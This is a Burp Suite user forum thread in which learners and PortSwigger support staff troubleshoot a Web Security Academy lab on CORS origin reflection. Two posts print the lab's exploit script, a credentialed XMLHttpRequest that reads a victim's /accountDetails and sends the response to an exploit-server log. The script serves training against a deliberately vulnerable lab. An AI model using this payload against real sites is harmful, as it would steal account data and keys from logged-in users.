Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Login to post

Lab: CORS vulnerability with basic origin reflection not working

Todd | Last updated: Dec 21, 2022 04:58AM UTC

In this lab, I'm stuck on step 5 of the solution: In the browser, go to the exploit server and enter the following HTML, replacing YOUR-LAB-ID with your unique lab URL: <script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script> After replacing YOUR-LAB-ID with my lab ID, and then clicking View Exploit, the server appears to hang and I don't get a response. If I click Deliver Exploit to Victim, the server redirects me to the exploit server page.

Todd | Last updated: Dec 21, 2022 05:00AM UTC

Update: CORS lab 2 isn't working either.

Malinga | Last updated: Dec 21, 2022 12:17PM UTC

CORS labs are not working for me either.

Liam, PortSwigger Agent | Last updated: Dec 21, 2022 02:50PM UTC

Thanks for these reports, Todd and Malinga. Our tests are passing for our CORS labs. Do you have another machine/network to test this on?

Todd | Last updated: Dec 22, 2022 01:40AM UTC

Hi, yes, I tried Firefox and Chrome on Mac OS 64 bit ARM, Ubuntu Linux 64 bit ARM, and Windows 64 bit on Intel, from two different networks (different physical locations and IPs as well). Unfortunately the same result in each case. It's a head-scratcher.

Liam, PortSwigger Agent | Last updated: Dec 22, 2022 01:38PM UTC

Hi Todd. We've manually completed the lab today. The lab is also passing our automated testing.

Todd | Last updated: Dec 22, 2022 02:50PM UTC

Could you tell me which OS and browser you're using? Then I can try that combo and see if I can recreate the problem. I know these problems are hard to track down -- it's part of my job too, so I understand. Thanks.

Todd | Last updated: Dec 22, 2022 02:54PM UTC

I tried it again this morning and the key is not in the URL as described in the lab. Here's what I see: https://<redacted>.exploit-server.net/log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22

Liam, PortSwigger Agent | Last updated: Dec 23, 2022 09:49AM UTC

Thanks, Todd. We'll look into this again. However, it is likely to be after the holidays.

Todd | Last updated: Dec 28, 2022 04:18AM UTC

SOLVED The text 'YOUR-LAB-ID' in the lab's solution is not completely correct. Taken literally, this value is just '<random number>.web-security-academy.net'. However, the prefix needs to be included that string for the call to req.open() to work, so the parameter must actually be 'https://<random number>.web-security-academy.net' This solution is clearer: <script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script>

Kavitha | Last updated: May 18, 2023 09:42PM UTC

Your Script didn't work for me Todd

Ben, PortSwigger Agent | Last updated: May 19, 2023 06:36AM UTC

Hi Kavitha, Can you provide some details of the steps that you are taking to try and solve this lab so that we can assist you further?

Joe | Last updated: Jun 17, 2023 05:16PM UTC

Didn't work for me either Todd

Damian | Last updated: Jul 07, 2023 12:09PM UTC

Still it doesn't work!

Michelle, PortSwigger Agent | Last updated: Jul 07, 2023 12:47PM UTC

Is there a specific CORS lab you're having issues with, or more than one? Can you please tell us more about the problems you're seeing and at what stage of the lab they occur?

Gareth | Last updated: Sep 04, 2023 08:20AM UTC

Hi all, I am having the same issue with this lab: Lab: CORS vulnerability with basic origin reflection When I enter the JS with my Lab Url, I either receive a page full of GET/POST requests or a blank screen. "GET /log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22 I have tried without the 'https://' and with 'Https://'. Any ideas? Thanks

Michelle, PortSwigger Agent | Last updated: Sep 04, 2023 10:32AM UTC

Hi In step 6, when you view the exploit, you will see the access logs for the exploit server on the main page, but if you check the URL that you have visited in the main URL bar, you should see the additional information. I hope this helps. You might also find it useful to follow along with the community solution video.

You need to Log in to post a reply. Or register here, for free.